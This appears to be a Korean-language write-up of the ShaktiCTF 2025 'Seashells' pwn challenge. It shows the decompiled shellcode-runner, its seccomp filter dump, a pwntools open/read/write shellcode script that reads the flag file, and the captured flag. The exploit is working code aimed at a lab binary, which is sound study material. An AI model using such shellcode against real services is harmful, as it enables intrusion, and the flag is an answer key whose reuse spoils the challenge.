Home
System Hacking
🐚

[ShaktiCTF 2025][Pwn] Seashells

Type
CTF
년도
2025
Name
ShaktiCTF
분야
System
세부분야
Seccomp
2025/07/28 00:55
1 more property

# Description

She picks seashells by the seashore. But she is very picky with what she keeps. Author: omelette_keychain
Plain Text
복사

# 분석

코드를 보면 입력 받은 buf의 데이터를 dest에 복사하고 dest에 있는 코드를 실행한다.
int __fastcall main(int argc, const char **argv, const char **envp) { size_t v3; // rdx int v5; // [rsp+14h] [rbp-52Ch] void *dest; // [rsp+20h] [rbp-520h] _BYTE buf[1288]; // [rsp+30h] [rbp-510h] BYREF unsigned __int64 v8; // [rsp+538h] [rbp-8h] v8 = __readfsqword(0x28u); seccomp_initialisation(argc, argv, envp); v3 = strlen("Give me the sea shells that you collected >>"); write(1, "Give me the sea shells that you collected >>", v3); if ( (unsigned int)read(0, buf, 0x500u) == -1 ) { perror("read failed"); return -1; } else { v5 = sysconf(30); dest = mmap(0, v5, 7, 34, -1, 0); if ( dest == (void *)-1LL ) { perror("mmap failed"); return -1; } else { memcpy(dest, buf, v5); ((void (*)(void))dest)(); munmap(dest, v5); return 0; } } }
C
복사
간단한 shellcoding 문제로 볼 수 있고, seccomp_initialisation를 통해서 syscall필터링하고 있다.
필터링하고 있는 syscall을 피하면 쉘을 획득 할 수 있다.

seccomp-tools 결과

line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001: 0x15 0x00 0x0c 0xc000003e if (A != ARCH_X86_64) goto 0014 0002: 0x20 0x00 0x00 0x00000000 A = sys_number 0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005 0004: 0x15 0x00 0x09 0xffffffff if (A != 0xffffffff) goto 0014 0005: 0x15 0x07 0x00 0x00000000 if (A == read) goto 0013 0006: 0x15 0x06 0x00 0x00000001 if (A == write) goto 0013 0007: 0x15 0x05 0x00 0x00000002 if (A == open) goto 0013 0008: 0x15 0x04 0x00 0x00000003 if (A == close) goto 0013 0009: 0x15 0x03 0x00 0x00000009 if (A == mmap) goto 0013 0010: 0x15 0x02 0x00 0x0000000b if (A == munmap) goto 0013 0011: 0x15 0x01 0x00 0x0000003c if (A == exit) goto 0013 0012: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0014 0013: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0014: 0x06 0x00 0x00 0x00000000 return KILL
C
복사

Exploit 방향

read, write, open, close을 이용해서 flag를 획득하는 문제다.

# Payload

from pwn import * filename = "./seashells" e = ELF(filename) p = process(filename) context.arch = 'amd64' shellcode = shellcraft.pushstr("./flag") shellcode += shellcraft.open('rsp', 0, 0) shellcode += shellcraft.read('rax', 'rsp', 100) shellcode += shellcraft.write(1, 'rsp', 100) shellcode = asm(shellcode) p.sendlineafter(b" >>", shellcode) p.interactive()
Python
복사

# Flag

shaktictf{u_g0t_wh@t_u_w15h3d__th3_s3@sh311_f1@g}
Plain Text
복사